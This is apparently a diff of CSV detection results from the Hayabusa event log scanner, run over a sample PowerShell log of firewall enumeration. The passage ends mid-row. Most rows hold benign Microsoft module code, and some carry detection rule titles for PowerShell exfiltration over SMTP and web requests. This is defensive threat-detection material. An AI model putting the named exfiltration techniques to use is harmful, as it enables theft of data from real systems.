+2021-10-25 16:23:05.598 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""1DA87E53-152B-403E-98DC-74D7B4D63D59"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. 
All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" CmdletsToExport= ""Format-List"", ""Format-Custom"", ""Format-Table"", ""Format-Wide"", ""Out-File"", ""Out-Printer"", ""Out-String"", ""Out-GridView"", ""Get-FormatData"", ""Export-FormatData"", ""ConvertFrom-Json"", ""ConvertTo-Json"", ""Invoke-RestMethod"", ""Invoke-WebRequest"", ""Register-ObjectEvent"", ""Register-EngineEvent"", ""Wait-Event"", ""Get-Event"", ""Remove-Event"", ""Get-EventSubscriber"", ""Unregister-Event"", ""New-Event"", ""Add-Member"", ""Add-Type"", ""Compare-Object"", ""ConvertTo-Html"", ""ConvertFrom-StringData"", ""Export-Csv"", ""Import-Csv"", ""ConvertTo-Csv"", ""ConvertFrom-Csv"", ""Export-Alias"", ""Invoke-Expression"", ""Get-Alias"", ""Get-Culture"", ""Get-Date"", ""Get-Host"", ""Get-Member"", ""Get-Random"", ""Get-UICulture"", ""Get-FileHash"", ""Get-Unique"", ""Export-PSSession"", ""Import-PSSession"", ""Import-Alias"", ""Import-LocalizedData"", ""Select-String"", ""Measure-Object"", ""New-Alias"", ""New-TimeSpan"", ""Read-Host"", ""Set-Alias"", ""Set-Date"", ""Start-Sleep"", ""Tee-Object"", ""Measure-Command"", ""Update-List"", ""Update-TypeData"", ""Update-FormatData"", ""Remove-TypeData"", ""Get-TypeData"", ""Write-Host"", ""Write-Progress"", ""New-Object"", ""Select-Object"", ""Group-Object"", ""Sort-Object"", ""Get-Variable"", ""New-Variable"", ""Set-Variable"", ""Remove-Variable"", ""Clear-Variable"", ""Export-Clixml"", ""Import-Clixml"", ""ConvertTo-Xml"", ""Select-Xml"", ""Write-Debug"", ""Write-Verbose"", ""Write-Warning"", ""Write-Error"", ""Write-Output"", ""Set-PSBreakpoint"", ""Get-PSBreakpoint"", ""Remove-PSBreakpoint"", ""Enable-PSBreakpoint"", ""Disable-PSBreakpoint"", ""Get-PSCallStack"", ""Send-MailMessage"", ""Get-TraceSource"", ""Set-TraceSource"", ""Trace-Command"", ""Show-Command"", ""Unblock-File"" NestedModules=""Microsoft.PowerShell.Commands.Utility.dll"",""Microsoft.PowerShell.Utility.psm1"" HelpInfoURI = 
'http://go.microsoft.com/fwlink/?linkid=285758' }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, 
ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = [Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } } function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, 
""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } } # SIG # Begin signature block # MIIavwYJKoZIhvcNAQcCoIIasDCCGqwCAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB # gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR # AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQU4uPI6oMmN45jE4gtibs9Byjz # 1dCgghWCMIIEwzCCA6ugAwIBAgITMwAAADUo7mFTkiJhkQAAAAAANTANBgkqhkiG # 9w0BAQUFADB3MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G # A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEw # HwYDVQQDExhNaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EwHhcNMTMwMzI3MjAwODI2 # WhcNMTQwNjI3MjAwODI2WjCBszELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjENMAsGA1UECxMETU9QUjEnMCUGA1UECxMebkNpcGhlciBEU0UgRVNO # OjMxQzUtMzBCQS03QzkxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAm9vWEfGEH1m0 # kUedzTgvsolxQaJbPc6WtX2a9wqAK0ICg8R8//f26pcftWw4XkuVVOjsk9K5TeT3 # KyaHr7vrG+hNHCFDF/igM5qRsYFNOIEkUwKxdnlaLqz7y4xcXTubXKU7NoBsI3S2 # xnffQyfNOpmouBP65aqjt8VzhFbsjsFIMwGJMa8nNq07LQDicQQxvva3dLFnP1rl # hLUBJpB4iYAlPj5CHFJKZCcCaM6iBr7QtT5EF4CZiImcwLkP1fI5lcM1FLsJEEW5 # 6m5frIDLh3xFZAImCU+adqVmvhBJKKO57P+y+mFb+WPqknL1SurKOz0TkYw7/TnW # STwC7nod4QIDAQABo4IBCTCCAQUwHQYDVR0OBBYEFLkUVdsQ7WBr1Q2DdA3Oc3OV # ImUcMB8GA1UdIwQYMBaAFCM0+NlSRnAK7UD7dvuzK7DDNbMPMFQGA1UdHwRNMEsw # SaBHoEWGQ2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3Rz # L01pY3Jvc29mdFRpbWVTdGFtcFBDQS5jcmwwWAYIKwYBBQUHAQEETDBKMEgGCCsG # AQUFBzAChjxodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY3Jv # c29mdFRpbWVTdGFtcFBDQS5jcnQwEwYDVR0lBAwwCgYIKwYBBQUHAwgwDQYJKoZI # hvcNAQEFBQADggEBAJaVlxhREadlaCDXqFbP6lUQVKjx5/JsbwouUz8YgQjPN/Y1 # ymKKoJBe4u9HzqrHBZj93hq26BKkmrnKpWKvyOY+ODJcA9PzaPlgnMeyJdykTGuP # 
BsvYtsFYIn6E1Wu56PE+L3n28vpsaOjKAl8BvrGgbPmPRbm4SwZfxJSO9+3r1yFa # uFZbeGfcQAl82pKj27zQmh2O5snaz1Iff7+W3owsX20ilqNJ+acaIl7/6cpyJUC4 # 87hUHlrIV1CyiyLmEOyt7aUQlFLU7VtXgskXVPZ03lGrVDTglUY63lUwGhdwL5f2 # CgYipvqCjochior3gYxSN0w6jQRbNcvzG4N1vl0wggTsMIID1KADAgECAhMzAAAA # sBGvCovQO5/dAAEAAACwMA0GCSqGSIb3DQEBBQUAMHkxCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBMB4XDTEzMDEyNDIyMzMzOVoXDTE0MDQyNDIyMzMzOVowgYMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xDTALBgNVBAsTBE1PUFIx # HjAcBgNVBAMTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAOivXKIgDfgofLwFe3+t7ut2rChTPzrbQH2zjjPmVz+l # URU0VKXPtIupP6g34S1Q7TUWTu9NetsTdoiwLPBZXKnr4dcpdeQbhSeb8/gtnkE2 # KwtA+747urlcdZMWUkvKM8U3sPPrfqj1QRVcCGUdITfwLLoiCxCxEJ13IoWEfE+5 # G5Cw9aP+i/QMmk6g9ckKIeKq4wE2R/0vgmqBA/WpNdyUV537S9QOgts4jxL+49Z6 # dIhk4WLEJS4qrp0YHw4etsKvJLQOULzeHJNcSaZ5tbbbzvlweygBhLgqKc+/qQUF # 4eAPcU39rVwjgynrx8VKyOgnhNN+xkMLlQAFsU9lccUCAwEAAaOCAWAwggFcMBMG # A1UdJQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRZcaZaM03amAeA/4Qevof5cjJB # 8jBRBgNVHREESjBIpEYwRDENMAsGA1UECxMETU9QUjEzMDEGA1UEBRMqMzE1OTUr # NGZhZjBiNzEtYWQzNy00YWEzLWE2NzEtNzZiYzA1MjM0NGFkMB8GA1UdIwQYMBaA # FMsR6MrStBZYAck3LjMWFrlMmgofMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9j # cmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY0NvZFNpZ1BDQV8w # OC0zMS0yMDEwLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6 # Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljQ29kU2lnUENBXzA4LTMx # LTIwMTAuY3J0MA0GCSqGSIb3DQEBBQUAA4IBAQAx124qElczgdWdxuv5OtRETQie # 7l7falu3ec8CnLx2aJ6QoZwLw3+ijPFNupU5+w3g4Zv0XSQPG42IFTp8263Os8ls # ujksRX0kEVQmMA0N/0fqAwfl5GZdLHudHakQ+hywdPJPaWueqSSE2u2WoN9zpO9q # GqxLYp7xfMAUf0jNTbJE+fA8k21C2Oh85hegm2hoCSj5ApfvEQO6Z1Ktwemzc6bS # Y81K4j7k8079/6HguwITO10g3lU/o66QQDE4dSheBKlGbeb1enlAvR/N6EXVruJd # 
PvV1x+ZmY2DM1ZqEh40kMPfvNNBjHbFCZ0oOS786Du+2lTqnOOQlkgimiGaCMIIF # vDCCA6SgAwIBAgIKYTMmGgAAAAAAMTANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm # iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQD # EyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAwODMx # MjIxOTMyWhcNMjAwODMxMjIyOTMyWjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBD # QTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALJyWVwZMGS/HZpgICBC # mXZTbD4b1m/My/Hqa/6XFhDg3zp0gxq3L6Ay7P/ewkJOI9VyANs1VwqJyq4gSfTw # aKxNS42lvXlLcZtHB9r9Jd+ddYjPqnNEf9eB2/O98jakyVxF3K+tPeAoaJcap6Vy # c1bxF5Tk/TWUcqDWdl8ed0WDhTgW0HNbBbpnUo2lsmkv2hkL/pJ0KeJ2L1TdFDBZ # +NKNYv3LyV9GMVC5JxPkQDDPcikQKCLHN049oDI9kM2hOAaFXE5WgigqBTK3S9dP # Y+fSLWLxRT3nrAgA9kahntFbjCZT6HqqSvJGzzc8OJ60d1ylF56NyxGPVjzBrAlf # A9MCAwEAAaOCAV4wggFaMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMsR6MrS # tBZYAck3LjMWFrlMmgofMAsGA1UdDwQEAwIBhjASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBT90TFO0yaKleGYYDuoMW+mPLzYLTAZBgkrBgEEAYI3 # FAIEDB4KAFMAdQBiAEMAQTAfBgNVHSMEGDAWgBQOrIJgQFYnl+UlE/wq4QpTlVnk # pDBQBgNVHR8ESTBHMEWgQ6BBhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtp # L2NybC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmwwVAYIKwYBBQUHAQEE # SDBGMEQGCCsGAQUFBzAChjhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl # cnRzL01pY3Jvc29mdFJvb3RDZXJ0LmNydDANBgkqhkiG9w0BAQUFAAOCAgEAWTk+ # fyZGr+tvQLEytWrrDi9uqEn361917Uw7LddDrQv+y+ktMaMjzHxQmIAhXaw9L0y6 # oqhWnONwu7i0+Hm1SXL3PupBf8rhDBdpy6WcIC36C1DEVs0t40rSvHDnqA2iA6VW # 4LiKS1fylUKc8fPv7uOGHzQ8uFaa8FMjhSqkghyT4pQHHfLiTviMocroE6WRTsgb # 0o9ylSpxbZsa+BzwU9ZnzCL/XB3Nooy9J7J5Y1ZEolHN+emjWFbdmwJFRC9f9Nqu # 1IIybvyklRPk62nnqaIsvsgrEA5ljpnb9aL6EiYJZTiU8XofSrvR4Vbo0HiWGFzJ # NRZf3ZMdSY4tvq00RBzuEBUaAF3dNVshzpjHCe6FDoxPbQ4TTj18KUicctHzbMrB # 7HCjV5JXfZSNoBtIA1r3z6NnCnSlNu0tLxfI5nI3EvRvsTxngvlSso0zFmUeDord # EN5k9G/ORtTTF+l5xAS00/ss3x+KnqwK+xMnQK3k+eGpf0a7B2BHZWBATrBC7E7t # 
s3Z52Ao0CW0cgDEf4g5U3eWh++VHEK1kmP9QFi58vwUheuKVQSdpw5OPlcmN2Jsh # rg1cnPCiroZogwxqLbt2awAdlq3yFnv2FoMkuYjPaqhHMS+a3ONxPdcAfmJH0c6I # ybgY+g5yjcGjPa8CQGr/aZuW4hCoELQ3UAjWwz0wggYHMIID76ADAgECAgphFmg0 # AAAAAAAcMA0GCSqGSIb3DQEBBQUAMF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAX # BgoJkiaJk/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0wNzA0MDMxMjUzMDlaFw0yMTA0MDMx # MzAzMDlaMHcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xITAf # BgNVBAMTGE1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQTCCASIwDQYJKoZIhvcNAQEB # BQADggEPADCCAQoCggEBAJ+hbLHf20iSKnxrLhnhveLjxZlRI1Ctzt0YTiQP7tGn # 0UytdDAgEesH1VSVFUmUG0KSrphcMCbaAGvoe73siQcP9w4EmPCJzB/LMySHnfL0 # Zxws/HvniB3q506jocEjU8qN+kXPCdBer9CwQgSi+aZsk2fXKNxGU7CG0OUoRi4n # rIZPVVIM5AMs+2qQkDBuh/NZMJ36ftaXs+ghl3740hPzCLdTbVK0RZCfSABKR2YR # JylmqJfk0waBSqL5hKcRRxQJgp+E7VV4/gGaHVAIhQAQMEbtt94jRrvELVSfrx54 # QTF3zJvfO4OToWECtR0Nsfz3m7IBziJLVP/5BcPCIAsCAwEAAaOCAaswggGnMA8G # A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFCM0+NlSRnAK7UD7dvuzK7DDNbMPMAsG # A1UdDwQEAwIBhjAQBgkrBgEEAYI3FQEEAwIBADCBmAYDVR0jBIGQMIGNgBQOrIJg # QFYnl+UlE/wq4QpTlVnkpKFjpGEwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcG # CgmSJomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWljcm9zb2Z0IFJvb3Qg # Q2VydGlmaWNhdGUgQXV0aG9yaXR5ghB5rRahSqClrUxzWPQHEy5lMFAGA1UdHwRJ # MEcwRaBDoEGGP2h0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1 # Y3RzL21pY3Jvc29mdHJvb3RjZXJ0LmNybDBUBggrBgEFBQcBAQRIMEYwRAYIKwYB # BQUHMAKGOGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljcm9z # b2Z0Um9vdENlcnQuY3J0MBMGA1UdJQQMMAoGCCsGAQUFBwMIMA0GCSqGSIb3DQEB # BQUAA4ICAQAQl4rDXANENt3ptK132855UU0BsS50cVttDBOrzr57j7gu1BKijG1i # uFcCy04gE1CZ3XpA4le7r1iaHOEdAYasu3jyi9DsOwHu4r6PCgXIjUji8FMV3U+r # kuTnjWrVgMHmlPIGL4UD6ZEqJCJw+/b85HiZLg33B+JwvBhOnY5rCnKVuKE5nGct # xVEO6mJcPxaYiyA/4gcaMvnMMUp2MT0rcgvI6nA9/4UKE9/CCmGO8Ne4F+tOi3/F # NSteo7/rvH0LQnvUU3Ih7jDKu3hlXFsBFwoUDtLaFJj1PLlmWLMtL+f5hYbMUVbo # 
nXCUbKw5TNT2eb+qGHpiKe+imyk0BncaYsk9Hm0fgvALxyy7z0Oz5fnsfbXjpKh0 # NbhOxXEjEiZ2CzxSjHFaRkMUvLOzsE1nyJ9C/4B5IYCeFTBm6EISXhrIniIh0EPp # K+m79EjMLNTYMoBMJipIJF9a6lbvpt6Znco6b72BJ3QGEe52Ib+bgsEnVLaxaj2J # oXZhtG6hE6a/qkfwEm/9ijJssv7fUciMI8lmvZ0dhxJkAj0tr1mPuOQh5bWwymO0 # eFQF1EEuUKyUsKV4q7OglnUa2ZKHE3UiLzKoCG6gW4wlv6DvhMoh1useT8ma7kng # 9wFlb4kLfchpyOZu6qeXzjEp/w7FW1zYTRuh2Povnj8uVRZryROj/TGCBKcwggSj # AgEBMIGQMHkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYD # VQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xIzAh # BgNVBAMTGk1pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBAhMzAAAAsBGvCovQO5/d # AAEAAACwMAkGBSsOAwIaBQCggcAwGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwIwYJKoZIhvcNAQkEMRYEFClk # UQl5qDpcmXxdpFeDJK8FifcsMGAGCisGAQQBgjcCAQwxUjBQoCaAJABXAGkAbgBk # AG8AdwBzACAAUABvAHcAZQByAFMAaABlAGwAbKEmgCRodHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcG93ZXJzaGVsbCAwDQYJKoZIhvcNAQEBBQAEggEALlxQato88b0W # GuCgTkjSdxozipikRZRALhDIbPeqH6HtmgJcwK723FNOko6J0Xrhnt1w+Ypx77X2 # 8yP9Hu2sG+Cm+vH4RcLCKR9zAUQGmURsoNhCcRebCKchavCcPqYzL8WmMToUVuEB # epnqGcNr8gMvhur6+Tw22bJewK48IdD96JBDVEoihHj8d0jwM19UFPuT+EmebCRv # 8ii/hESmbCZnwQclRzaoA3oJ+odsWN+XbE3fHhrGSfnE7yaiMKsyHKQ+RsV9c1x9 # /XgOkPj1o/cfKgQ0qeOamP7HmABCWv9jGBaQ/lpLASraT6gaTl9yEPvuKx1ozorh # G1o2H651lKGCAigwggIkBgkqhkiG9w0BCQYxggIVMIICEQIBATCBjjB3MQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSEwHwYDVQQDExhNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBQQ0ECEzMAAAA1KO5hU5IiYZEAAAAAADUwCQYFKw4DAhoF # AKBdMBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTEz # MTIxODAwMjI1OFowIwYJKoZIhvcNAQkEMRYEFKH1XT6678OZm4aTERf5dKwwQZed # MA0GCSqGSIb3DQEBBQUABIIBAGgc0v8jALuDbFhj0n+eoe+T+K3O7SCk9SDcc8wC # 9MP+HYeyr7IvyMJY9Prn1v/JEkUNBczhWmFluGBzw1ASpTkP5hJRbdZFiQkbtqR1 # PZi8TWsbcoWjbqzwR3fgiwydRlkDu0zKO+P3pbuHFgO2ACb7ggLRllTgfWNJFZGg # iHFwS0JLQttb18AZTZyt7VteGhzOrcfRP97+bPpidJXfR1eMXbeoXuAROO0LdNP1 # 
6QcsS/++dFMLo+s7ISTcdh9OTKg672kD7zo2+UKZ/MvJbsOikD7cFJppM2ZDCnvi # S5HhTmzKz47z2m+/DsWq7NMZ1pfJFojTeMw8niuUPNOZWRg= # SIG # End signature block",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-FileHash { [CmdletBinding(DefaultParameterSetName = ""Path"")] param( [Parameter(Mandatory, ParameterSetName=""Path"", Position = 0)] [System.String[]] $Path, [Parameter(Mandatory, ParameterSetName=""LiteralPath"", ValueFromPipelineByPropertyName = $true)] [Alias(""PSPath"")] [System.String[]] $LiteralPath, [Parameter(Mandatory, ParameterSetName=""Stream"")] [System.IO.Stream] $InputStream, [ValidateSet(""SHA1"", ""SHA256"", ""SHA384"", ""SHA512"", ""MACTripleDES"", ""MD5"", ""RIPEMD160"")] [System.String] $Algorithm=""SHA256"" ) begin { # Construct the strongly-typed crypto object $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm) } process { if($PSCmdlet.ParameterSetName -eq ""Stream"") { GetStreamHash -InputStream $InputStream -RelatedPath $null -Hasher $hasher } else { $pathsToProcess = @() if($PSCmdlet.ParameterSetName -eq ""LiteralPath"") { $pathsToProcess += Resolve-Path -LiteralPath $LiteralPath | Foreach-Object ProviderPath } if($PSCmdlet.ParameterSetName -eq ""Path"") { $pathsToProcess += Resolve-Path $Path | Foreach-Object ProviderPath } foreach($filePath in $pathsToProcess) { if(Test-Path -LiteralPath $filePath -PathType Container) { continue } try { # Read the file specified in $FilePath as a Byte array [system.io.stream]$stream = [system.io.file]::OpenRead($filePath) GetStreamHash -InputStream $stream -RelatedPath $filePath -Hasher $hasher } catch [Exception] { $errorMessage = 
[Microsoft.PowerShell.Commands.UtilityResources]::FileReadError -f $FilePath, $_ Write-Error -Message $errorMessage -Category ReadError -ErrorId ""FileReadError"" -TargetObject $FilePath return } finally { if($stream) { $stream.Close() } } } } } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function GetStreamHash { param( [System.IO.Stream] $InputStream, [System.String] $RelatedPath, [System.Security.Cryptography.HashAlgorithm] $Hasher) # Compute file-hash using the crypto object [Byte[]] $computedHash = $Hasher.ComputeHash($InputStream) [string] $hash = [BitConverter]::ToString($computedHash) -replace '-','' if ($RelatedPath -eq $null) { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } else { $retVal = [PSCustomObject] @{ Algorithm = $Algorithm.ToUpperInvariant() Hash = $hash Path = $RelatedPath } $retVal.psobject.TypeNames.Insert(0, ""Microsoft.Powershell.Utility.FileHash"") $retVal } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
